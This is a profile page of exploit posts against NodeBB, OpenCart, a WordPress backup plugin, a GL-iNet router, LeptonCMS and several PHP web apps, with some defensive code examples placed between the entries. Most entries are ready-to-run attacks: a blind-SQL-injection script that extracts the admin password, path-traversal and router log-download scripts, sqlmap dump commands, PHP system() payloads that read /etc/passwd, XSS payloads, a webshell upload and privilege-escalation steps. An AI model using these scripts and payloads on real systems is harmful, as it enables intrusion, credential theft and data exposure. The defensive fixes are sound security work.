
Everything posted by HireHackking
-
Broken Access Control - on NodeBB v3.6.7
Exploit Title: Broken Access Control - on NodeBB v3.6.7
Date: 22/2/2024
Exploit Author: Vibhor Sharma
Vendor Homepage: https://nodebb.org/
Version: 3.6.7

Description:
I identified a broken access control vulnerability in NodeBB v3.6.7, enabling attackers to access restricted information intended solely for administrators. Specifically, this data is accessible only to admins and not regular users. Through testing, I discovered that when a user accesses the group section of the application and intercepts the response for the corresponding request, certain attributes are provided in the JSON response. By manipulating these attributes, a user can gain access to tabs restricted to administrators. Upon reporting this issue, it was duly acknowledged and promptly resolved by the developers.

Steps To Reproduce:
1) A user with the least privileges needs to navigate to the group section.
2) Intercept the response for the group request.
3) In the response, modify the following parameters:
   "system":0,"private":0,"isMember":true,"isPending":true,"isInvited":true,"isOwner":true,"isAdmin":true,
4) Forward the request; the attacker can now see the restricted information.

Impact:
The attacker was able to access the restricted tabs of the Admin group, which are only allowed to the administrators.
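The defect described above is a server that lets flags echoed back by the browser decide what it serves. The following is an added example, not NodeBB code: the group store, user ids and tab names are constructed for illustration. It contrasts the anti-pattern (trusting `isOwner`/`isAdmin` from the client) with a check that recomputes the flags from the session's user id and the server-side membership store on every request, so editing the intercepted JSON changes nothing.

```python
"""Server-side group authorization that never trusts client-supplied flags.

Added example (not NodeBB code). GROUPS, SITE_ADMINS and PRIVILEGED_TABS are
constructed stand-ins for the application's real membership store.
"""

# Constructed server-side state: group membership/ownership and site administrators.
GROUPS = {
    "administrators": {"system": True, "private": True, "members": {1}, "owners": {1}},
    "registered-users": {"system": True, "private": False, "members": {1, 2, 3}, "owners": set()},
}
SITE_ADMINS = {1}

# Tabs that must only be served to group owners or site admins (hypothetical names).
PRIVILEGED_TABS = {"pending", "invited", "manage"}


def group_view(user_id, group_name):
    """Flags the server sends to the client, derived purely from server state."""
    g = GROUPS[group_name]
    is_admin = user_id in SITE_ADMINS
    return {
        "system": int(g["system"]),
        "private": int(g["private"]),
        "isMember": user_id in g["members"],
        "isOwner": user_id in g["owners"] or is_admin,
        "isAdmin": is_admin,
    }


def authorize_tab(session_user_id, group_name, tab, client_json=None):
    """Server-side decision whether `tab` may be served.

    `client_json` stands for whatever the browser sends back (possibly a tampered
    copy of an earlier response). It is accepted only to show that it is ignored:
    the decision is recomputed from the session user and the membership store.
    """
    if tab not in PRIVILEGED_TABS:
        return True
    view = group_view(session_user_id, group_name)
    return bool(view["isOwner"] or view["isAdmin"])


def vulnerable_authorize_tab(session_user_id, group_name, tab, client_json):
    """The anti-pattern: privilege flags taken from data the client controls."""
    if tab not in PRIVILEGED_TABS:
        return True
    return bool(client_json.get("isOwner")) or bool(client_json.get("isAdmin"))


if __name__ == "__main__":
    # A regular user (id 3) edits the flags in the intercepted group response.
    tampered = group_view(3, "administrators")
    tampered.update({"isMember": True, "isOwner": True, "isAdmin": True})
    print("client-trusting check:", vulnerable_authorize_tab(3, "administrators", "manage", tampered))
    print("server-side check:    ", authorize_tab(3, "administrators", "manage", tampered))
```

The response flags are fine as UI hints; the fix is that every endpoint behind a privileged tab performs its own `authorize_tab`-style check, which is what makes the tampered response harmless.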
-
Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)
```python
# Exploit Title: Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)
# Google Dork: n/a
# Date: 04/02/2024
# Exploit Author: Gian Paris C. Agsam
# Vendor Homepage: https://github.com/projectworldsofficial
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip
# Version: 1.0
# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12
# CVE : n/a

import requests
import argparse
from colorama import (Fore as F, Back as B, Style as S)

BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITE

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')
parser.add_argument('-u', '--url', help='')
args = parser.parse_args()


def banner():
    print(f"""{FR}
·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄ ▄▄▄ ▪ ·▄▄▄▄ ▪
▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪ ██ ██▪ ██
▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄ ▄█▀▄ ▐█·▐█· ▐█▌
▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██.
██ ▀█▄▀▪▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀ ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀•
    Github: https://github.com/offensive-droid {FW}
""")


# Define the characters to test
chars = [
    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
    'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
    'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
    'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
    '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '@', '#'
]


def sqliPayload(char, position, userid, column, table):
    sqli = 'admin\' UNION SELECT IF(SUBSTRING('
    sqli += str(column) + ','
    sqli += str(position) + ',1) = \''
    sqli += str(char) + '\',sleep(3),null) FROM '
    sqli += str(table) + ' WHERE uname="admin"\''
    return sqli


def postRequest(URL, sqliReq, char, position):
    sqliURL = URL
    params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}
    req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)
    if req.elapsed.total_seconds() >= 2:
        print("{} : {}".format(char, req.elapsed.total_seconds()))
        return char
    return ''


def theHarvester(target, CHARS, url):
    #print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id']))
    print("Retrieving admin password".format(target['table'], target['column'], target['id']))
    position = 1
    full_pass = ""
    while position < 5:
        for char in CHARS:
            sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])
            found_char = postRequest(url, sqliReq, char, position)
            full_pass += found_char
        position += 1
    return full_pass


if __name__ == "__main__":
    banner()
    HOST = str(args.url)
    PATH = HOST + "/hotel booking/admin/login.php"
    adminPassword = {"id": "1", "table": "manager", "column": "upass"}
    adminPass = theHarvester(adminPassword, chars, PATH)
    print("Admin Password:", adminPass)
```
-
Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal
```python
# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
# Date: 2024-03-06
# Exploit Author: Ven3xy
# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.10
# Tested on: Linux

import sys
import requests
from urllib.parse import urljoin
import time


def exploit(target_url, file_name, depth):
    traversal = '../' * depth
    exploit_url = urljoin(target_url, '/wp-admin/tools.php')
    params = {
        'page': 'backup_manager',
        'download_backup_file': f'{traversal}{file_name}'
    }
    response = requests.get(exploit_url, params=params)

    if response.status_code == 200 and response.headers.get('Content-Disposition') \
            and 'attachment; filename' in response.headers['Content-Disposition'] \
            and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:
        print(response.text)  # Replace with the desired action for the downloaded content
        file_path = f'simplebackup_{file_name}'
        with open(file_path, 'wb') as file:
            file.write(response.content)
        print(f'File saved in: {file_path}')
    else:
        print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python exploit.py <target_url> <file_name> <depth>")
        sys.exit(1)

    target_url = sys.argv[1]
    file_name = sys.argv[2]
    depth = int(sys.argv[3])

    print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n")
    time.sleep(5)
    exploit(target_url, file_name, depth)
```
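The plugin bug above is a download handler that joins a user-controlled file name onto a backup directory without confining the result. The following is an added example, not the plugin's code: a resolver that only serves plain file names that resolve inside the backup directory (symlinks included), exercised against a throwaway directory with constructed files. `resolve_backup_path`, `vulnerable_resolve` and the sample file names are this example's own.

```python
import os
import tempfile
from pathlib import Path


def resolve_backup_path(backup_dir, requested_name):
    """Absolute path of a backup file if, and only if, it stays inside backup_dir.

    Raises ValueError for traversal, absolute paths or anything that is not a bare
    file name, and for names that resolve (via symlinks) outside the directory.
    """
    base = Path(backup_dir).resolve()
    # Reject before touching the filesystem: the name must be a single path component.
    if requested_name != os.path.basename(requested_name) or requested_name in ("", ".", ".."):
        raise ValueError(f"rejected: {requested_name!r} is not a plain file name")
    candidate = (base / requested_name).resolve()
    # resolve() follows symlinks, so a symlinked entry pointing outside is caught too.
    if candidate.parent != base:
        raise ValueError(f"rejected: {requested_name!r} escapes {base}")
    if not candidate.is_file():
        raise FileNotFoundError(requested_name)
    return candidate


def vulnerable_resolve(backup_dir, requested_name):
    """The pattern behind the advisory: the request value is joined unchecked."""
    return os.path.normpath(os.path.join(backup_dir, requested_name))


def demo():
    """Build a temporary backup layout and try both resolvers; returns name -> outcome."""
    with tempfile.TemporaryDirectory() as tmp:
        backups = Path(tmp) / "backups"
        backups.mkdir()
        # Constructed files: one legitimate backup, one secret one level up.
        (backups / "site-2024-03-06.zip").write_bytes(b"PK\x03\x04 constructed backup")
        (Path(tmp) / "wp-config.php").write_text("<?php /* constructed secret config */")

        results = {}
        for name in ["site-2024-03-06.zip", "../wp-config.php", "../../../../etc/passwd", "/etc/passwd"]:
            try:
                results[name] = resolve_backup_path(backups, name).name
            except (ValueError, FileNotFoundError) as e:
                results[name] = f"blocked ({type(e).__name__})"
        # The unchecked join walks straight out of the backup directory.
        results["vulnerable:../wp-config.php"] = os.path.exists(vulnerable_resolve(backups, "../wp-config.php"))
        return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:35} -> {outcome}")
```

Keeping the check to "one path component, then verify the resolved parent" avoids the usual mistakes of stripping `../` substrings (which can be re-assembled) or comparing string prefixes (which `/backups-old/` would defeat).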
-
liveSite Version 2019.1 - Remote Code Execution
## Exploit Title: liveSite Version : 2019.1 Campaigns Remote Code Execution
### Date: 2024-1-9
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://livesite.com/
### Version : 2019.1
### Tested on: https://www.softaculous.com/apps/cms/liveSite

1 ) Login with admin credentials. Click Campaigns > Create Campaign > choose format Plain Text, and write your payload in the body:
    https://127.0.0.1/liveSite/livesite/add_email_campaign.php

    Payload : <?php echo system('cat /etc/passwd'); ?>

2 ) After saving you will see the result:

Result:
```
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:997:User for polkitd:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:997:995::/var/lib/chrony:/sbin/nologin
soft:x:1000:1000::/home/soft:/sbin/nologin
saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
emps:x:995:1001::/home/emps:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
exim:x:93:93::/var/spool/exim:/sbin/nologin
vmail:x:5000:5000::/var/local/vmail:/bin/bash
pinguzo:x:992:992::/etc/pinguzo:/bin/false
webuzo:x:987:987::/home/webuzo:/bin/bash
apache:x:986:985::/home/apache:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
```
-
OpenCart Core 4.0.2.3 - 'search' SQLi
# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi
# Date: 2024-04-2
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://github.com/opencart/opencart/releases
# Version: 4.0.2.3
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz

* Description :

OpenCart allows SQL Injection via the parameter 'search' in /index.php?route=product/search&search=. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

* Steps to Reproduce :

- Go to : http://127.0.0.1/index.php?route=product/search&search=test
- Now use sqlmap:

```
sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs
```

===========

Output :

```
Parameter: search (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: route=product/search&search=') AND 2427=2427-- drCa

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb
```
-
ASUS Control Center Express 01.06.15 - Unquoted Service Path
# Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service Path Privilege Escalation
# Date: 2024-04-02
# Exploit Author: Alaa Kachouh
# Vendor Homepage: https://www.asus.com/campaign/ASUS-Control-Center-Express/global/
# Version: Up to 01.06.15
# Tested on: Windows
# CVE: CVE-2024-27673

===================================================================

ASUS Control Center Express Version =< 01.06.15 contains an unquoted service path which allows attackers to escalate privileges to the system level. Assuming attackers have write access to C:\, the attackers can abuse the Asus service "Apro console service"/apro_console.exe which upon restarting will invoke C:\Program.exe with SYSTEM privileges. The binary path of the service alone isn't susceptible, but upon its initiation, it will execute C:\program.exe as SYSTEM.

Service Name: AProConsoleService
Binary impacted: apro_console.exe

# If a malicious payload is inserted into C:\ and the service is executed in any way, this can grant privileged access to the system and perform malicious activities.
-
GL-iNet MT6000 4.5.5 - Arbitrary File Download
```python
# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download
# CVE: CVE-2024-27356
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: 2/26/2024
# Exploit Author: Bandar Alharbi (aggressor)
# Vendor Homepage: www.gl-inet.com
# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin
# Tested Model: GL-X3000 Spitz AX
# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md

import sys
import requests
import json

requests.packages.urllib3.disable_warnings()

h = {'Content-type': 'application/json;charset=utf-8', 'User-Agent': 'Mozilla/5.0 (compatible;contxbot/1.0)'}


def DoesTarExist():
    r = requests.get(url + "/js/logread.tar", verify=False, timeout=30, headers=h)
    if r.status_code == 200:
        f = open("logread.tar", "wb")
        f.write(r.content)
        f.close()
        print("[*] Full logs archive `logread.tar` has been downloaded!")
        print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")
        return True
    else:
        print("[*] The `logread.tar` archive does not exist however ... try again later!")
        return False


def isVulnerable():
    r1 = requests.post(url + "/rpc", verify=False, timeout=30, headers=h)
    if r1.status_code == 500 and "nginx" in r1.text:
        r2 = requests.get(url + "/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
        if "Admin-Token" in r2.text:
            j = {"jsonrpc": "2.0", "id": 1, "method": "call", "params": ["", "ui", "check_initialized"]}
            r3 = requests.post(url + "/rpc", verify=False, json=j, timeout=30, headers=h)
            ver = r3.json()['result']['firmware_version']
            model = r3.json()['result']['model']
            if ver.startswith(('4.')):
                print("[*] Firmware version (%s) is vulnerable!" % ver)
                print("[*] Device model is: %s" % model)
                return True
    print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")
    return False


def isAlive():
    try:
        r = requests.get(url, verify=False, timeout=30, headers=h)
        if r.status_code != 200:
            print("[*] Make sure the target's web interface is accessible!")
            return False
        elif r.status_code == 200:
            print("[*] The target is reachable!")
            return True
    except Exception:
        print("[*] Error occurred when connecting to the target!")
        pass
    return False


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("exploit.py url")
        sys.exit(0)
    url = sys.argv[1]
    url = url.lower()
    if not url.startswith(('http://', 'https://')):
        print("[*] Invalid url format! It should be http[s]://<domain or ip>")
        sys.exit(0)
    if url.endswith("/"):
        url = url.rstrip("/")
    print("[*] GL.iNet Unauthenticated Full Logs Downloader")
    try:
        if (isAlive() and isVulnerable()) == (True and True):
            DoesTarExist()
    except KeyboardInterrupt:
        print("[*] The exploit has been stopped by the user!")
        sys.exit(0)
```
-
Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
# Exploit Title: Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
# Date: 2024-04-2
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.rapid7.com/
# Software Link: https://www.rapid7.com/products/nexpose/
# Version: 6.6.240
# Tested: Windows 10 x64

# Step to discover Unquoted Service Path:

```
C:\Users\saudh>wmic service where 'name like "%nexposeconsole%"' get name, displayname, pathname, startmode, startname
DisplayName               Name            PathName                                                   StartMode  StartName
Nexpose Security Console  nexposeconsole  "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe"  Auto       LocalSystem
```

# Service info:

```
C:\Users\saudh>sc qc nexposeconsole
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: nexposeconsole
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Nexpose Security Console
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
```

#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
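Both unquoted service path entries above (ASUS Control Center Express and this Nexpose one) come down to the same audit question: for a service whose image path contains spaces and is not quoted, which intermediate paths would the service control manager try before the real binary, and are any of them writable by unprivileged users? The following is an added example, not part of either advisory: it parses a `wmic service get name,pathname`-style inventory, lists those intermediate paths for each unquoted entry, and produces the quoted `binPath` value that remediates it. `AcmeConsoleService`, `AcmeUpdater` and their paths are hypothetical; the `nexposeconsole` line is the quoted path from the output above and serves as the negative case.

```python
import re

# Constructed inventory in the shape of `wmic service get name,pathname` output.
# AcmeConsoleService / AcmeUpdater are hypothetical; nexposeconsole is the quoted
# path shown in the advisory and should produce no finding.
SAMPLE_SERVICES = r"""
AcmeConsoleService   C:\Program Files\Acme\Acme Control Center\acme_console.exe -service
nexposeconsole       "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe"
Spooler              C:\Windows\System32\spoolsv.exe
AcmeUpdater          C:\Program Files (x86)\Acme Corp\Updater\svc.exe /run
"""

# Executable is everything up to the first ".exe"; the rest are service arguments.
EXE_RE = re.compile(r'(?i)^(.*?\.exe)(\s.*)?$')


def unquoted_path_candidates(pathname):
    """Intermediate paths tried before the real binary when the image path is unquoted.

    Returns [] when the path is quoted or has no space before the executable, i.e.
    when it is safe. For 'C:\\Program Files\\Acme\\svc.exe' Windows tries
    'C:\\Program.exe' first, then 'C:\\Program Files\\Acme\\svc.exe'; each
    intermediate location must not be writable by unprivileged users.
    """
    p = pathname.strip()
    if p.startswith('"'):
        return []
    m = EXE_RE.match(p)
    exe = m.group(1) if m else p
    parts = exe.split(' ')
    if len(parts) == 1:
        return []
    candidates, prefix = [], parts[0]
    for part in parts[1:]:
        candidates.append(prefix + '.exe')
        prefix += ' ' + part
    return candidates


def quoted_pathname(pathname):
    """Remediated binPath value: the executable wrapped in double quotes, arguments kept."""
    p = pathname.strip()
    if p.startswith('"'):
        return p
    m = EXE_RE.match(p)
    if not m:
        return p
    return f'"{m.group(1)}"{m.group(2) or ""}'


def audit(inventory_text):
    """Map each unquoted service name to the intermediate paths an administrator must check."""
    findings = {}
    for line in inventory_text.strip().splitlines():
        name, _, pathname = line.strip().partition(' ')
        cands = unquoted_path_candidates(pathname)
        if cands:
            findings[name] = cands
    return findings


if __name__ == "__main__":
    for svc, paths in audit(SAMPLE_SERVICES).items():
        print(svc)
        for p in paths:
            print("   would try:", p)
```

On a real host the remediation is applied with `sc config <ServiceName> binPath= "\"<quoted path>\" <args>"` (the value `quoted_pathname` returns), after which the service is restarted; the ACLs of the listed intermediate directories (here `C:\` and `C:\Program Files\Acme\`) are what decide whether an unquoted entry is actually exploitable on that machine.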
-
Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)
# Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)
# Google Dork: NA
# Date: 28-03-2024
# Exploit Author: Sandeep Vishwakarma
# Vendor Homepage: https://code-projects.org
# Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/
# Version: v1.0
# Tested on: Windows 10
# CVE : CVE-2024-29412

# Description:
Stored Cross Site Scripting vulnerability in Hospital Management System v1.0 allows an attacker to execute arbitrary code via a crafted payload to the 'patient_id', 'first_name', 'middle_initial' and 'last_name' parameters in the /receptionist.php component.

# POC:
1. Go to the User Login page: http://localhost/HospitalManagementSystem-gh-pages/
2. Login with the "r1" ID, which redirects to the http://localhost/HospitalManagementSystem-gh-pages/receptionist.php endpoint.
3. In the Patient information functionality, add this payload in all parameters: "><script>alert('1')</script>
4. Click on submit.

# Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md
-
E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)
# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)
# Google Dork: NA
# Date: 28-03-2024
# Exploit Author: Sandeep Vishwakarma
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Version: v1.0
# Tested on: Windows 10

# Description:
Stored Cross Site Scripting vulnerability in E-INSUARANCE v1.0 allows an attacker to execute arbitrary code via a crafted payload to the Firstname and lastname parameters in the profile component.

# POC:
1. After login, go to http://127.0.0.1/E-Insurance/Script/admin/?page=profile
2. In the fname & lname parameters add the payload "><script>alert("Hacked_by_Sandy")</script>
3. Click on submit.

# Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md
-
Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)
# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)
# Date: 02/04/2024
# Exploit Author: Sandeep Vishwakarma
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: v1.0
# Tested on: Windows 10
# CVE: CVE-2024-29410

# Description:
File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component.

# POC:
1. Go to: http://127.0.0.1/fuelflow/index.php
2. Login with the default username=mayuri.infospace@gmail.com and Password=admin
3. Go to "http://127.0.0.1/fuelflow/admin/web.php"
4. Upload the san.php file in the "Image" field
5. Phpinfo will be present on the "http://localhost/fuelflow/assets/images/phpinfo.php" page
6. The content of the san.php file is given below:

<?php phpinfo();?>

# Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29410.md
-
Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection
# Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24499

### SQL Injection:

> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.

### Affected Components:

> /employee_akpoly/Admin/edit_profile.php
> Two parameters, `txtfullname` and `txtphone`, within the admin edit profile mechanism are vulnerable to SQL Injection.

### Description:

> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.

## Proof of Concept:

### SQLMap

Save the following request to `edit_profile.txt`:

```
POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_akpoly/Admin/edit_profile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate=
```

Use `sqlmap` with the `-r` option to exploit the vulnerability:

```
sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump
```

## Recommendations

When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
-
LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2024-1-19
# Exploit Author: tmrswrr
# Category: Webapps
# Vendor Homepage: https://www.lepton-cms.com/
# Version : 7.0.0

1 ) Login with admin credentials
    > https://127.0.0.1/LEPTON/backend/login/index.php
2 ) Go to the Languages page
    > https://127.0.0.1/LEPTON/backend/languages/index.php
3 ) Upload the upgrade.php file on the Languages page
    > <?php echo system('id'); ?>
4 ) After clicking install you will see the result

# Result :
```
uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)
uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)
```
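The Petrol Pump Management entry above and this LeptonCMS one are both upload handlers that accept a `.php` file where an image or language package was expected and then serve it from a web-reachable directory. The following is an added example, not code from either project: an upload validator for an image field that judges only the final extension against an allowlist, requires the content's leading bytes to match that type, rejects embedded PHP open tags, and stores the file under a server-chosen random name. `validate_image_upload`, `store_upload`, the `ALLOWED_TYPES` table and the sample uploads are this example's own.

```python
import secrets
import tempfile
from pathlib import Path

# Allowed image types: final extension -> bytes the content must start with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_SIZE = 2 * 1024 * 1024  # 2 MiB, an arbitrary cap for the example


class UploadRejected(Exception):
    pass


def validate_image_upload(original_name, data):
    """Return the canonical extension if `data` is an acceptable image, else raise UploadRejected."""
    if len(data) == 0 or len(data) > MAX_SIZE:
        raise UploadRejected("empty or oversized upload")
    # Only the final extension counts: 'shell.php.png' is judged as .png and must then look like a PNG;
    # 'logo.png.php' is judged as .php and refused outright.
    ext = Path(original_name).suffix.lower().lstrip(".")
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension .{ext or '<none>'} not allowed")
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected(f"content does not match a .{ext} file")
    # Defence in depth: a genuine image header followed by PHP source is still refused.
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("embedded PHP open tag in image data")
    return "jpg" if ext == "jpeg" else ext


def store_upload(upload_dir, original_name, data):
    """Validate, then save under a random server-chosen name; the client's name never reaches the disk."""
    ext = validate_image_upload(original_name, data)
    new_name = f"{secrets.token_hex(16)}.{ext}"
    with open(Path(upload_dir) / new_name, "wb") as f:
        f.write(data)
    return new_name


def demo():
    """Constructed uploads exercising the validator; returns original name -> outcome."""
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
    samples = {
        "logo.png": png,
        "san.php": b"<?php phpinfo();?>",
        "shell.php.png": b"<?php phpinfo();?>",
        "logo.png.php": png,
        "polyglot.png": png + b"<?php phpinfo();?>",
    }
    outcome = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in samples.items():
            try:
                outcome[name] = "stored as " + store_upload(tmp, name, data)
            except UploadRejected as e:
                outcome[name] = f"rejected: {e}"
    return outcome


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:15} -> {result}")
```

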